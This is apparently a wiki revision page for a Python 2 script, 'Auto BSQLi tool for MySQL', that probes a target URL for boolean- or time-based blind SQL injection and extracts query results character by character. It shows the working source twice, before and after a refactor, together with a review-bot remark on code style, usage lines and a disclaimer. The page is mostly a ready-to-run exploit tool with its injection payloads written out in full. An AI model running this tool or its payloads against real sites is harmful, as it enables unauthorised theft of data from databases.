
Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

Line 13: Line 13:
 
{{code|text= <source lang="python">
 
{{code|text= <source lang="python">
 
#!/usr/bin/python
 
#!/usr/bin/python
 
+
 
import sys,re,urllib,urllib2,string,time
 
import sys,re,urllib,urllib2,string,time
 
from optparse import OptionParser
 
from optparse import OptionParser
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
+
 
def request(URL):
 
def request(URL):
useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
+
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, useragent)
+
  req = urllib2.Request(URL, None, user_agent)
try:
+
  request=urllib2.urlopen(req)
+
except HTTPError,  e:
+
  print('[!] The server couldnt fulfill the request.')
+
  print('[!] Error code: '+str(e.code))
+
  sys.exit(1)
+
except URLError,  e:
+
  print('[!] We failed to reach a server.')
+
  print('[!] Reason: '+str(e.reason))
+
  sys.exit(1)
+
return len(request.read())
+
  
 +
  try:
 +
    request = urllib2.urlopen(req)
 +
 +
  except HTTPError, e:
 +
    print('[!] The server couldnt fulfill the request.')
 +
    print('[!] Error code: ' + str(e.code))
 +
    sys.exit(1)
 +
 +
  except URLError, e:
 +
    print('[!] We failed to reach a server.')
 +
    print('[!] Reason: ' + str(e.reason))
 +
    sys.exit(1)
 +
 +
  return len(request.read())
 +
 
def value(URL):
 
def value(URL):
target=0
+
  target = 0
end=0
+
  end = 0
nextmaybe=0
+
  next_maybe = 0
floor=0
+
  floor = 0
ceiling=255
+
  ceiling = 255
maybe = int(ceiling)/2
+
  maybe = int(ceiling)/2
while(end!=9):
+
 
  if iswhat(URL, maybe, '>'):
+
  while(end != 9):
    floor = maybe
+
    if(is_what(URL, maybe, '>')):
    nextmaybe = int(maybe + ((ceiling - floor)/2))
+
      floor = maybe
  elif iswhat(URL, maybe, '<'):
+
      next_maybe = int(maybe + ((ceiling - floor)/2))
    ceiling = maybe
+
 
    nextmaybe = int(maybe - ((ceiling - floor)/2))
+
    elif(is_what(URL, maybe, '<')):
  elif iswhat(URL, maybe, '='):
+
      ceiling = maybe
    return chr(maybe)
+
      next_maybe = int(maybe - ((ceiling - floor)/2))
  maybe = nextmaybe
+
 
                end+=1
+
    elif(is_what(URL, maybe, '=')):
        return 'done'
+
      return chr(maybe)
 +
 
 +
    maybe = next_maybe
 +
    end += 1
  
 +
  return 'done'
 +
 +
def is_what(URL, maybe, op):
 +
  if(sqli_type == 'boolean'):
 +
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
 +
    if(TrueResponse == ValueResponse):
 +
      return 1
 +
    else:
 +
      return 0
 +
  elif(sqli_type == 'time'):
 +
    start = time.time()
 +
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
 +
    elapsed_time = (time.time() - start)
 +
    if (elapsed_time > 2):
 +
      return 1
 +
    else:
 +
      return 0
 +
 +
def vuln_check(URL):
 +
  print('[+] Checking site...')
  
def iswhat(URL,maybe,op):
+
  global TrueResponse
if(sqlitype=='boolean'):
+
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+'))
+
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
  if(TrueResponse==ValueResponse):
+
    return 1
+
  else:
+
    return 0
+
elif(sqlitype=='time'):
+
start = time.time()
+
  ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 2):
+
    return 1
+
  else:
+
    return 0
+
  
def vulncheck(URL):
+
  if(TrueResponse != FalseResponse):
print('[+] Checking site...')
+
    print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
global TrueResponse
+
    return 'boolean'
TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+'))
+
  else:
FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+'))
+
    start = time.time()
if(TrueResponse!=FalseResponse):
+
    SleepResponse = request(URL + '%20and%20sleep(5)--+')
  print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
+
    elapsed_time = (time.time() - start)
  return 'boolean'
+
else:
+
  start = time.time()
+
  SleepResponse=request(URL+'%20and%20sleep(5)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 5):
+
    print('[+] Site seems to be vulnerable to time based blind SQL injection.')
+
    return 'time'
+
  else:
+
    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
+
    sys.exit(1)
+
  
 +
    if(elapsed_time > 5):
 +
      print('[+] Site seems to be vulnerable to time based blind SQL injection.')
 +
      return 'time'
 +
    else:
 +
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
 +
      sys.exit(1)
 +
 
def main():
 
def main():
print('''
+
  print('''
Auto BSQLi tool for MySQL
+
        Auto BSQLi tool for MySQL
      ''')
+
        ''')
 +
 +
  usage = 'usage: %prog -u <target> -i <injection>'
 +
  parser = OptionParser(usage=usage)
 +
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
 +
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 +
 +
  (options, args) = parser.parse_args()
 +
  if(options.URL and options.INJECTION):
 +
    URL = options.URL
 +
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
 +
  else:
 +
    print('[!] Missing url or injection parameter.')
 +
    print('[!] Use --help.')
 +
    sys.exit(1)
 +
 +
  global sqli_type
 +
  sqli_type = vuln_check(URL)
 +
  position = 1
 +
  dump = ''
 +
  print('[+] Dumping data...')
  
usage = 'usage: %prog -u <target> -i <injection>'
+
  while(1):
parser = OptionParser(usage=usage)
+
    if(sqli_type == 'boolean'):
parser.add_option("-u", action="store", type="string", dest="URL",
+
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"http://site.tld/index.php?id=1%27"')
+
    elif(sqli_type == 'time'):
parser.add_option('-i', action='store', type='string', dest='INJECTION',
+
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"select version()"')
+
  
(options, args) = parser.parse_args()
+
    if(letter == 'done'):
if options.URL and options.INJECTION:
+
      break
  URL=options.URL
+
  INJECTION=urllib2.quote(options.INJECTION.encode("utf8"))
+
else:
+
  print('[!] Missing url or injection parameter.')
+
  print('[!] Use --help.')
+
  sys.exit(1)
+
  
global sqlitype
+
    dump = dump + letter
sqlitype=vulncheck(URL)
+
    position += 1
position=1
+
dump=''
+
print('[+] Dumping data...')
+
while(1):
+
if(sqlitype=='boolean'):
+
letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
  elif(sqlitype=='time'):
+
    letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
if(letter=='done'):
+
break
+
    dump=dump+letter
+
  position+=1
+
if(dump):
+
print('[+] Data: '+dump)
+
else:
+
print('[!] No data dumped. Check your injection.')
+
  
 +
  if(dump):
 +
    print('[+] Data: ' + dump)
 +
  else:
 +
    print('[!] No data dumped. Check your injection.')
 +
 
if __name__ == "__main__":
 
if __name__ == "__main__":
    main()
+
  main()
 
</source>}}
 
</source>}}
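Review bot: The new `is_what()` depends on two undeclared module globals, `sqli_type` (assigned in `main()`) and `TrueResponse` (assigned in `vuln_check()`), reading both without a `global` statement or a parameter, and nothing at module level records that those two functions must run first. A short comment near the imports would make the coupling visible, e.g. `# Shared state: sqli_type is set by main(), TrueResponse by vuln_check(); is_what() reads both.` The misspelled `ValueResonse` in the time branch of `is_what()` is assigned and never read, so the assignment can be dropped. The rendering interleaves old and new lines, so the hunk boundaries above are inferred rather than certain.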

Revision as of 17:31, 22 September 2012

This script uses time-based and boolean-based blind SQL injection to obtain the desired information from a MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python
 
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
  """Fetch URL with a fixed browser User-Agent and return the response body length.

  On an HTTP error status, or when no server could be reached, a message
  is printed and the process exits with status 1.
  """
  headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
  try:
    response = urllib2.urlopen(urllib2.Request(URL, None, headers))
  except HTTPError, err:
    # The server answered, but with an error status code.
    print('[!] The server couldnt fulfill the request.')
    print('[!] Error code: ' + str(err.code))
    sys.exit(1)
  except URLError, err:
    # No usable answer from the server at all.
    print('[!] We failed to reach a server.')
    print('[!] Reason: ' + str(err.reason))
    sys.exit(1)
  body = response.read()
  return len(body)
 
def value(URL):
  """Recover one character by binary-searching the byte range 0..255.

  `URL` is the probe prefix; is_what() is asked whether the hidden value
  is greater than, less than or equal to the current guess. Returns the
  character as soon as '=' holds, or the string 'done' when no match is
  found within nine probing rounds (main() treats 'done' as end of data).
  """
  low, high = 0, 255
  guess = int(high)/2  # Python 2 integer division: first guess is 127
  following = 0
  for _round in range(9):
    if is_what(URL, guess, '>'):
      low = guess
      following = int(guess + ((high - low)/2))
    elif is_what(URL, guess, '<'):
      high = guess
      following = int(guess - ((high - low)/2))
    elif is_what(URL, guess, '='):
      return chr(guess)
    guess = following
  return 'done'
 
def is_what(URL, maybe, op):
  """Oracle used by value(): does `<hidden value> <op> <maybe>` hold?

  Reads the module globals `sqli_type` (assigned in main()) and
  `TrueResponse` (assigned in vuln_check()). Returns 1 when the
  comparison holds, 0 when it does not, and None for an unknown
  `sqli_type`.
  """
  probe = str(URL) + str(op) + str(maybe)
  if sqli_type == 'boolean':
    # Same body length as the baseline recorded by vuln_check() means "true".
    length = int(request(probe + '--+'))
    return 1 if length == TrueResponse else 0
  if sqli_type == 'time':
    # A response slower than two seconds means "true".
    started = time.time()
    request(probe + ')*2)--+')
    return 1 if (time.time() - started) > 2 else 0
 
def vuln_check(URL):
  """Decide which blind technique the target answers to.

  Stores the body length of the always-true probe in the module global
  `TrueResponse` (read later by is_what()). Returns 'boolean' when the
  true and false probes differ in length, 'time' when the sleep probe
  takes longer than five seconds, and exits with status 1 otherwise.
  """
  global TrueResponse
  print('[+] Checking site...')
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  false_length = int(request(URL + '%20AND%2034%20like%2043--+'))
  if TrueResponse != false_length:
    print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
    return 'boolean'
  # Lengths matched, so fall back to the timing probe.
  started = time.time()
  request(URL + '%20and%20sleep(5)--+')
  if (time.time() - started) > 5:
    print('[+] Site seems to be vulnerable to time based blind SQL injection.')
    return 'time'
  print('[!] Seems like site isnt vulnerable to blind SQL injection.')
  sys.exit(1)
 
def main():
  """Command-line entry point.

  Parses -u/-i, lets vuln_check() pick the technique (stored in the
  module global `sqli_type`), then calls value() once per character
  position until it reports 'done' and prints what was collected.
  """
  global sqli_type
  print('''
        Auto BSQLi tool for MySQL
        ''')
  parser = OptionParser(usage='usage: %prog -u <target> -i <injection>')
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
  options, _args = parser.parse_args()
  if not (options.URL and options.INJECTION):
    print('[!] Missing url or injection parameter.')
    print('[!] Use --help.')
    sys.exit(1)
  URL = options.URL
  INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
  sqli_type = vuln_check(URL)
  print('[+] Dumping data...')
  # One probe prefix per technique; the character position is appended per round.
  prefixes = {
    'boolean': URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20',
    'time': URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20',
  }
  collected = []
  position = 1
  while True:
    letter = value(prefixes[sqli_type] + str(position) + '%20for%201))')
    if letter == 'done':
      break
    collected.append(letter)
    position += 1
  dump = ''.join(collected)
  if dump:
    print('[+] Data: ' + dump)
  else:
    print('[!] No data dumped. Check your injection.')
 
# Run only when executed as a script, not when imported as a module.
if __name__ == '__main__':
  main()